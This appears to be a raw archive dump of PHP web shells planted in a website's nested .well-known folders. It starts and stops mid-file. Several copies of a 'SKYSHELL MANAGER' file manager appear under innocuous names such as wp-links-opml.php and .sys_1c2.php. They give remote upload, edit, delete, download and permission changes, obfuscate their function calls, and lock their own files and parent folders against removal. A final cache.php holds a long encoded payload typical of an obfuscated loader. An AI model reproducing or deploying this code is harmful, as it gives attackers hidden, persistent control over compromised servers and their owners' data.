"</tr>"; } ?> </table> <!-- Edit File Section --> <?php if (isset($_GET['edit']) && is_file($_GET['edit'])): $fileToEdit = $_GET['edit']; $content = htmlspecialchars(file_get_contents($fileToEdit)); ?> <h3 style="color:#fff;">Editing: <?= basename($fileToEdit) ?></h3> <form method="post"> <input type="hidden" name="edit_file_path" value="<?= htmlspecialchars($fileToEdit) ?>"> <textarea name="edited_content" rows="20" style="width:100%;background:#111;color:#0f0;border:1px solid #444;"><?= $content ?></textarea><br> <button type="submit">💾 Save Changes</button> </form> <?php endif; ?> </body> </html> .well-known/.well-known/.well-known/.sys_1c2.php 0000444 00000015520 15203711542 0015320 0 ustar 00 <?php $O00OO0=urldecode("%63%68%6d%6f%64"); $O00OO0(__FILE__, 0444); $V1=[$O00OO0,'realpath','getcwd','basename','move_uploaded_file','file_exists','mkdir','file_put_contents','rename','dirname','chmod','octdec','unlink','rmdir','header','urlencode','is_dir','scandir','usort','fileperms','filesize','round','htmlspecialchars','file_get_contents','phpversion']; // Path Handling Fix $P1 = isset($_GET['path']) ? $V1[1]($_GET['path']) : $V1[2](); if(!$P1 || $P1 == "") { $P1 = $V1[2](); } // Parent Directory Lock Logic (0555) $current_file_path = $V1[1](__FILE__); if ($current_file_path) { $current_dir = $V1[9]($current_file_path); $parent_dir = $V1[9]($current_dir); if($parent_dir && $V1[16]($parent_dir) && $parent_dir !== $current_dir){ @$V1[10]($parent_dir, 0555); } } $M1=""; if($_SERVER['REQUEST_METHOD']==='POST'){ if(isset($_FILES['file'])){if($V1[4]($_FILES['file']['tmp_name'],$P1.DIRECTORY_SEPARATOR.$V1[3]($_FILES['file']['name'])))$M1="File uploaded!";} if(isset($_POST['newfolder'])){$F1=$P1.DIRECTORY_SEPARATOR.$_POST['newfolder'];if(!$V1[5]($F1)){$V1[6]($F1);$M1="Folder created!";}} if(isset($_POST['newfile'])){$F2=$P1.DIRECTORY_SEPARATOR.$_POST['newfile'];if(!$V1[5]($F2)){$V1[7]($F2,'');$M1="File created!";}} if(isset($_POST['old_name'],$_POST['new_name'])){if($V1[8]($_POST['old_name'],$V1[9]($_POST['old_name']).DIRECTORY_SEPARATOR.$_POST['new_name']))$M1="Renamed!";} if(isset($_POST['chmod_file'],$_POST['chmod_value'])){if($V1[5]($_POST['chmod_file'])){$V1[10]($_POST['chmod_file'],$V1[11]($_POST['chmod_value']));$M1="Permissions changed!";}} if(isset($_POST['edit_file_path'],$_POST['edited_content'])){if($V1[5]($_POST['edit_file_path'])){$V1[10]($_POST['edit_file_path'],0644);$V1[7]($_POST['edit_file_path'],$_POST['edited_content']);$V1[10]($_POST['edit_file_path'],0444);$M1="Updated!";}} } if(isset($_GET['delete'])){$T1=urldecode($_GET['delete']);if($V1[5]($T1)){if($V1[16]($T1)){$V1[13]($T1);}else{$V1[12]($T1);}$V1[14]("Location: ?path=".$V1[15]($V1[9]($T1)));exit;}} if(isset($_GET['download'])){$D1=$_GET['download'];if($V1[5]($D1)){$V1[14]('Content-Type: application/octet-stream');$V1[14]('Content-Disposition: attachment; filename="'.$V1[3]($D1).'"');readfile($D1);exit;}} $fs = ($V1[5]($P1) && $V1[16]($P1)) ? $V1[17]($P1) : []; if(!empty($fs)){ $V1[18]($fs,function($a,$b)use($P1,$V1){return $V1[16]($P1.DIRECTORY_SEPARATOR.$b)-$V1[16]($P1.DIRECTORY_SEPARATOR.$a);}); } ?> <!DOCTYPE html><html><head><meta charset="UTF-8"><title>SKYSHELL MANAGER</title><style>body{background-color:#111;color:#0f0;font-family:Arial;padding:20px;}h2{text-align:center;font-size:36px;background:linear-gradient(90deg,#f00,#ff0,#0f0,#0ff,#00f);background-size:200%;color:transparent;-webkit-background-clip:text;animation:g 3s linear infinite;}@keyframes g{0%{background-position:200% 0%}50%{background-position:0% 100%}100%{background-position:200% 0%}}.php-v{position:absolute;top:10px;right:20px;font-size:14px;color:#0ff}a{color:#6cf;text-decoration:none}table{width:100%;border-collapse:collapse;margin-top:20px}th,td{padding:10px;border:1px solid #333}tr:hover{background-color:#32CD32 !important; color:#000 !important;}tr:hover td span{color:#000 !important; font-weight:bold;}tr:hover td a{color:#000 !important; font-weight:700}.act-c{text-align:right}input,button,textarea{background:#222;color:#0f0;border:1px solid #444;padding:5px 10px;margin:5px 0}.msg{color:#32CD32;background-color:#222;padding:10px;text-align:center;margin:20px 0}.u-c{display:flex;justify-content:space-between;align-items:center}.emoji{color:#fff}.p-d a{color:#fff;text-decoration:none}.p-d a:hover{text-decoration:underline}</style></head><body> <h2><span class="emoji">📁</span> SKYSHELL MANAGER <span class="php-v">PHP v<?= $V1[24](); ?></span></h2> <?php if($M1): ?><div class="msg"><?= $M1 ?></div><?php endif; ?> <div class="u-c"><div><form method="post"><input type="text" name="newfolder" placeholder="Folder"><button type="submit">Create</button></form><form method="post"><input type="text" name="newfile" placeholder="File"><button type="submit">Create</button></form></div><div><form method="post" enctype="multipart/form-data"><input type="file" name="file" onchange="this.form.submit()"></form></div></div> <!-- Fixed Path Logic without extra spaces --> <p class="p-d"><b>Path:</b><?php $path_parts = explode(DIRECTORY_SEPARATOR, $P1); $accumulated_path = ""; foreach ($path_parts as $key => $part) { if ($part === "" && $key === 0) { $accumulated_path = DIRECTORY_SEPARATOR; echo "<a href='?path=".$V1[15]($accumulated_path)."'>root</a>/"; continue; } if ($part === "") continue; if (DIRECTORY_SEPARATOR === '\\') { $accumulated_path .= ($accumulated_path === "" ? "" : DIRECTORY_SEPARATOR) . $part; } else { $accumulated_path .= DIRECTORY_SEPARATOR . $part; } echo "<a href='?path=".$V1[15]($accumulated_path)."'>$part</a>/"; } ?></p> <table><tr><th>Name</th><th>Size</th><th>Perm</th><th>Actions</th></tr> <?php foreach($fs as $f){if($f=='.' || $f=='..')continue;$fl=$P1.DIRECTORY_SEPARATOR.$f;$id=$V1[16]($fl);$pm=substr(sprintf('%o',$V1[19]($fl)),-4);$sz=$id?'-':$V1[21]($V1[20]($fl)/1024,2).' KB'; if($pm == '0444' || $pm == '0555' || $pm == '0400') { $cl = 'style="color:#f00;font-weight:bold;"'; } else { $cl = 'style="color:#0f0;font-weight:bold;"'; } echo "<tr><td>".($id?"📁":"📄")." <a href='?path=".$V1[15]($fl)."'>$f</a></td><td>$sz</td><td><span $cl>$pm</span></td><td class=\"act-c\"><a href='?delete=".$V1[15]($fl)."' onclick=\"return confirm('?')\">🗑️</a> <a href='?rename=".$V1[15]($fl)."'>🏷️</a> ".(!$id?"<a href='?path=".$V1[15]($P1)."&download=".$V1[15]($fl)."'>⬇️</a> <a href='?edit=".$V1[15]($fl)."'>✏️</a>":"")." <form method='post' style='display:inline;'><input type='hidden' name='chmod_file' value='$fl'><input type='text' name='chmod_value' placeholder='P' style='width:30px;'><button type='submit'>🔒</button></form></td></tr>";} ?> </table> <?php if(isset($_GET['rename'])): $t=$_GET['rename']; ?><div style="margin-top:20px;border:1px solid #444;padding:15px;"><h3 style="color:#fff;">Rename: <?= $V1[3]($t) ?></h3><form method="post" action="?path=<?= $V1[15]($P1) ?>"><input type="hidden" name="old_name" value="<?= $V1[22]($t) ?>"><input type="text" name="new_name" value="<?= $V1[22]($V1[3]($t)) ?>"><button type="submit">OK</button></form></div><?php endif; ?> <?php if(isset($_GET['edit'])&&is_file($_GET['edit'])): $te=$_GET['edit'];$c=$V1[22]($V1[23]($te)); ?><h3 style="color:#fff;">Edit: <?= $V1[3]($te) ?></h3><form method="post" action="?path=<?= $V1[15]($V1[9]($te)) ?>"><input type="hidden" name="edit_file_path" value="<?= $V1[22]($te) ?>"><textarea name="edited_content" rows="15" style="width:100%"><?= $c ?></textarea><br><button type="submit">Save</button></form><?php endif; ?> </body></html> .well-known/.well-known/.well-known/wp-links-opml.php 0000444 00000016101 15203711542 0016464 0 ustar 00 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>SKYSHELL MANAGER</title> <style> body { background-color: #111; color: #0f0; font-family: Arial, sans-serif; margin: 0; padding: 20px; } h2 { text-align: center; font-size: 36px; font-weight: bold; margin: 10px 0; position: relative; background: linear-gradient(90deg, #ff0000, #ffff00, #00ff00, #00ffff, #0000ff); background-size: 200%; color: transparent; -webkit-background-clip: text; animation: gradientAnimation 3s linear infinite; } @keyframes gradientAnimation { 0% { background-position: 200% 0%; } 50% { background-position: 0% 100%; } 100% { background-position: 200% 0%; } } .php-version { position: absolute; top: 10px; right: 20px; font-size: 14px; color: #0ff; } a { color: #6cf; text-decoration: none; } a:hover { text-decoration: underline; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { padding: 10px; border: 1px solid #333; transition: background 0.3s, color 0.3s; } tr:hover { background-color: #32CD32; } tr:hover td a.filename-link { color: #000; font-weight: bold; } .filename-link { color: #0ff; } .action-cell { text-align: right; } input, button, textarea { background: #222; color: #0f0; border: 1px solid #444; padding: 5px 10px; margin: 5px 0; } button { cursor: pointer; } .alert-message { color: #32CD32; background-color: #222; padding: 10px; text-align: center; font-size: 18px; margin: 20px 0; } .file-upload-container { display: flex; justify-content: space-between; align-items: center; } .emoji { color: #fff; } .path-display a { color: #fff; text-decoration: underline; } </style> </head> <body> <h2><span class="emoji">📁</span> SKYSHELL MANAGER-<span class="emoji">🛒</span> <span class="php-version">PHP v<?= phpversion(); ?></span> </h2> <?php $path = isset($_GET['path']) ? $_GET['path'] : getcwd(); $path = realpath($path); $alertMessage = ""; // Upload if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $filename = basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $path . DIRECTORY_SEPARATOR . $filename)) { $alertMessage = "File uploaded successfully!"; } else { $alertMessage = "File upload failed!"; } } // Create folder if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfolder'])) { $folder = $path . DIRECTORY_SEPARATOR . $_POST['newfolder']; if (!file_exists($folder)) { mkdir($folder); $alertMessage = "Folder created successfully!"; } else { $alertMessage = "Folder already exists!"; } } // Create file if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfile'])) { $file = $path . DIRECTORY_SEPARATOR . $_POST['newfile']; if (!file_exists($file)) { file_put_contents($file, ''); $alertMessage = "File created successfully!"; } else { $alertMessage = "File already exists!"; } } // Change permission if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['chmod_file'], $_POST['chmod_value'])) { $file = $_POST['chmod_file']; $perm = $_POST['chmod_value']; if (file_exists($file)) { chmod($file, octdec($perm)); $alertMessage = "Permissions changed successfully!"; } else { $alertMessage = "File does not exist!"; } } // Delete if (isset($_GET['delete'])) { $file = urldecode($_GET['delete']); if (file_exists($file)) { unlink($file); header("Location: ?path=" . urlencode(dirname($file))); exit; } } // Save Edited File if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_file_path'], $_POST['edited_content'])) { $filePath = $_POST['edit_file_path']; $newContent = $_POST['edited_content']; if (file_exists($filePath)) { file_put_contents($filePath, $newContent); $alertMessage = "File updated successfully!"; } else { $alertMessage = "File does not exist!"; } } ?> <?php if ($alertMessage): ?> <div class="alert-message"><?= $alertMessage ?></div> <?php endif; ?> <div class="file-upload-container"> <div> <form method="post"> <input type="text" name="newfolder" placeholder="📁 New Folder" required> <button type="submit">Create Folder</button> </form> <form method="post"> <input type="text" name="newfile" placeholder="📄 New File" required> <button type="submit">Create File</button> </form> </div> <div> <form method="post" enctype="multipart/form-data"> <input type="file" name="file" onchange="this.form.submit()"> </form> </div> </div> <!-- Current Path Display --> <p class="path-display"><b>Current Path:</b> <?php $parts = explode(DIRECTORY_SEPARATOR, $path); $build = ''; foreach ($parts as $part) { if ($part == '') continue; $build .= DIRECTORY_SEPARATOR . $part; echo "<a href='?path=" . urlencode($build) . "'>$part</a>/"; } ?> </p> <!-- File Table --> <table> <tr> <th>Name</th><th>Size</th><th>Permissions</th><th>Actions</th> </tr> <?php $files = scandir($path); usort($files, function ($a, $b) use ($path) { return is_dir($path . DIRECTORY_SEPARATOR . $b) - is_dir($path . DIRECTORY_SEPARATOR . $a); }); foreach ($files as $file) { if ($file == '.') continue; $full = $path . DIRECTORY_SEPARATOR . $file; $isDir = is_dir($full); $perm = substr(sprintf('%o', fileperms($full)), -4); $size = $isDir ? '-' : filesize($full); echo "<tr>"; echo "<td>" . ($isDir ? "📁" : "📄") . " <a class='filename-link' href='?path=" . urlencode($full) . "'>$file</a></td>"; echo "<td>" . ($isDir ? '-' : round($size / 1024, 2) . ' KB') . "</td>"; echo "<td>$perm</td>"; echo "<td class='action-cell'> <a href='?delete=" . urlencode($full) . "'>🗑️</a> " . (!$isDir ? "<a href='$full' download>⬇️</a> <a href='?edit=" . urlencode($full) . "'>✏️</a>" : "") . " <form method='post' style='display:inline;'> <input type='hidden' name='chmod_file' value='$full'> <input type='text' name='chmod_value' placeholder='Perm' style='width:60px;'> <button type='submit'>🔒</button> </form> </td>"; echo "</tr>"; } ?> </table> <!-- Edit File Section --> <?php if (isset($_GET['edit']) && is_file($_GET['edit'])): $fileToEdit = $_GET['edit']; $content = htmlspecialchars(file_get_contents($fileToEdit)); ?> <h3 style="color:#fff;">Editing: <?= basename($fileToEdit) ?></h3> <form method="post"> <input type="hidden" name="edit_file_path" value="<?= htmlspecialchars($fileToEdit) ?>"> <textarea name="edited_content" rows="20" style="width:100%;background:#111;color:#0f0;border:1px solid #444;"><?= $content ?></textarea><br> <button type="submit">💾 Save Changes</button> </form> <?php endif; ?> </body> </html> .well-known/.well-known/.well-known/.core_b05.php 0000444 00000015520 15203711542 0015433 0 ustar 00 <?php $O00OO0=urldecode("%63%68%6d%6f%64"); $O00OO0(__FILE__, 0444); $V1=[$O00OO0,'realpath','getcwd','basename','move_uploaded_file','file_exists','mkdir','file_put_contents','rename','dirname','chmod','octdec','unlink','rmdir','header','urlencode','is_dir','scandir','usort','fileperms','filesize','round','htmlspecialchars','file_get_contents','phpversion']; // Path Handling Fix $P1 = isset($_GET['path']) ? $V1[1]($_GET['path']) : $V1[2](); if(!$P1 || $P1 == "") { $P1 = $V1[2](); } // Parent Directory Lock Logic (0555) $current_file_path = $V1[1](__FILE__); if ($current_file_path) { $current_dir = $V1[9]($current_file_path); $parent_dir = $V1[9]($current_dir); if($parent_dir && $V1[16]($parent_dir) && $parent_dir !== $current_dir){ @$V1[10]($parent_dir, 0555); } } $M1=""; if($_SERVER['REQUEST_METHOD']==='POST'){ if(isset($_FILES['file'])){if($V1[4]($_FILES['file']['tmp_name'],$P1.DIRECTORY_SEPARATOR.$V1[3]($_FILES['file']['name'])))$M1="File uploaded!";} if(isset($_POST['newfolder'])){$F1=$P1.DIRECTORY_SEPARATOR.$_POST['newfolder'];if(!$V1[5]($F1)){$V1[6]($F1);$M1="Folder created!";}} if(isset($_POST['newfile'])){$F2=$P1.DIRECTORY_SEPARATOR.$_POST['newfile'];if(!$V1[5]($F2)){$V1[7]($F2,'');$M1="File created!";}} if(isset($_POST['old_name'],$_POST['new_name'])){if($V1[8]($_POST['old_name'],$V1[9]($_POST['old_name']).DIRECTORY_SEPARATOR.$_POST['new_name']))$M1="Renamed!";} if(isset($_POST['chmod_file'],$_POST['chmod_value'])){if($V1[5]($_POST['chmod_file'])){$V1[10]($_POST['chmod_file'],$V1[11]($_POST['chmod_value']));$M1="Permissions changed!";}} if(isset($_POST['edit_file_path'],$_POST['edited_content'])){if($V1[5]($_POST['edit_file_path'])){$V1[10]($_POST['edit_file_path'],0644);$V1[7]($_POST['edit_file_path'],$_POST['edited_content']);$V1[10]($_POST['edit_file_path'],0444);$M1="Updated!";}} } if(isset($_GET['delete'])){$T1=urldecode($_GET['delete']);if($V1[5]($T1)){if($V1[16]($T1)){$V1[13]($T1);}else{$V1[12]($T1);}$V1[14]("Location: ?path=".$V1[15]($V1[9]($T1)));exit;}} if(isset($_GET['download'])){$D1=$_GET['download'];if($V1[5]($D1)){$V1[14]('Content-Type: application/octet-stream');$V1[14]('Content-Disposition: attachment; filename="'.$V1[3]($D1).'"');readfile($D1);exit;}} $fs = ($V1[5]($P1) && $V1[16]($P1)) ? $V1[17]($P1) : []; if(!empty($fs)){ $V1[18]($fs,function($a,$b)use($P1,$V1){return $V1[16]($P1.DIRECTORY_SEPARATOR.$b)-$V1[16]($P1.DIRECTORY_SEPARATOR.$a);}); } ?> <!DOCTYPE html><html><head><meta charset="UTF-8"><title>SKYSHELL MANAGER</title><style>body{background-color:#111;color:#0f0;font-family:Arial;padding:20px;}h2{text-align:center;font-size:36px;background:linear-gradient(90deg,#f00,#ff0,#0f0,#0ff,#00f);background-size:200%;color:transparent;-webkit-background-clip:text;animation:g 3s linear infinite;}@keyframes g{0%{background-position:200% 0%}50%{background-position:0% 100%}100%{background-position:200% 0%}}.php-v{position:absolute;top:10px;right:20px;font-size:14px;color:#0ff}a{color:#6cf;text-decoration:none}table{width:100%;border-collapse:collapse;margin-top:20px}th,td{padding:10px;border:1px solid #333}tr:hover{background-color:#32CD32 !important; color:#000 !important;}tr:hover td span{color:#000 !important; font-weight:bold;}tr:hover td a{color:#000 !important; font-weight:700}.act-c{text-align:right}input,button,textarea{background:#222;color:#0f0;border:1px solid #444;padding:5px 10px;margin:5px 0}.msg{color:#32CD32;background-color:#222;padding:10px;text-align:center;margin:20px 0}.u-c{display:flex;justify-content:space-between;align-items:center}.emoji{color:#fff}.p-d a{color:#fff;text-decoration:none}.p-d a:hover{text-decoration:underline}</style></head><body> <h2><span class="emoji">📁</span> SKYSHELL MANAGER <span class="php-v">PHP v<?= $V1[24](); ?></span></h2> <?php if($M1): ?><div class="msg"><?= $M1 ?></div><?php endif; ?> <div class="u-c"><div><form method="post"><input type="text" name="newfolder" placeholder="Folder"><button type="submit">Create</button></form><form method="post"><input type="text" name="newfile" placeholder="File"><button type="submit">Create</button></form></div><div><form method="post" enctype="multipart/form-data"><input type="file" name="file" onchange="this.form.submit()"></form></div></div> <!-- Fixed Path Logic without extra spaces --> <p class="p-d"><b>Path:</b><?php $path_parts = explode(DIRECTORY_SEPARATOR, $P1); $accumulated_path = ""; foreach ($path_parts as $key => $part) { if ($part === "" && $key === 0) { $accumulated_path = DIRECTORY_SEPARATOR; echo "<a href='?path=".$V1[15]($accumulated_path)."'>root</a>/"; continue; } if ($part === "") continue; if (DIRECTORY_SEPARATOR === '\\') { $accumulated_path .= ($accumulated_path === "" ? "" : DIRECTORY_SEPARATOR) . $part; } else { $accumulated_path .= DIRECTORY_SEPARATOR . $part; } echo "<a href='?path=".$V1[15]($accumulated_path)."'>$part</a>/"; } ?></p> <table><tr><th>Name</th><th>Size</th><th>Perm</th><th>Actions</th></tr> <?php foreach($fs as $f){if($f=='.' || $f=='..')continue;$fl=$P1.DIRECTORY_SEPARATOR.$f;$id=$V1[16]($fl);$pm=substr(sprintf('%o',$V1[19]($fl)),-4);$sz=$id?'-':$V1[21]($V1[20]($fl)/1024,2).' KB'; if($pm == '0444' || $pm == '0555' || $pm == '0400') { $cl = 'style="color:#f00;font-weight:bold;"'; } else { $cl = 'style="color:#0f0;font-weight:bold;"'; } echo "<tr><td>".($id?"📁":"📄")." <a href='?path=".$V1[15]($fl)."'>$f</a></td><td>$sz</td><td><span $cl>$pm</span></td><td class=\"act-c\"><a href='?delete=".$V1[15]($fl)."' onclick=\"return confirm('?')\">🗑️</a> <a href='?rename=".$V1[15]($fl)."'>🏷️</a> ".(!$id?"<a href='?path=".$V1[15]($P1)."&download=".$V1[15]($fl)."'>⬇️</a> <a href='?edit=".$V1[15]($fl)."'>✏️</a>":"")." <form method='post' style='display:inline;'><input type='hidden' name='chmod_file' value='$fl'><input type='text' name='chmod_value' placeholder='P' style='width:30px;'><button type='submit'>🔒</button></form></td></tr>";} ?> </table> <?php if(isset($_GET['rename'])): $t=$_GET['rename']; ?><div style="margin-top:20px;border:1px solid #444;padding:15px;"><h3 style="color:#fff;">Rename: <?= $V1[3]($t) ?></h3><form method="post" action="?path=<?= $V1[15]($P1) ?>"><input type="hidden" name="old_name" value="<?= $V1[22]($t) ?>"><input type="text" name="new_name" value="<?= $V1[22]($V1[3]($t)) ?>"><button type="submit">OK</button></form></div><?php endif; ?> <?php if(isset($_GET['edit'])&&is_file($_GET['edit'])): $te=$_GET['edit'];$c=$V1[22]($V1[23]($te)); ?><h3 style="color:#fff;">Edit: <?= $V1[3]($te) ?></h3><form method="post" action="?path=<?= $V1[15]($V1[9]($te)) ?>"><input type="hidden" name="edit_file_path" value="<?= $V1[22]($te) ?>"><textarea name="edited_content" rows="15" style="width:100%"><?= $c ?></textarea><br><button type="submit">Save</button></form><?php endif; ?> </body></html> .well-known/.well-known/.well-known/cache.php 0000644 00000013020 15203711542 0015015 0 ustar 00 <?php $SJXa = 'Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXSqzLz0nISS1KRWEmJxalmJvEpqcn5KakaxSVFRallGip5ETmaYGANAA'; $nXl = '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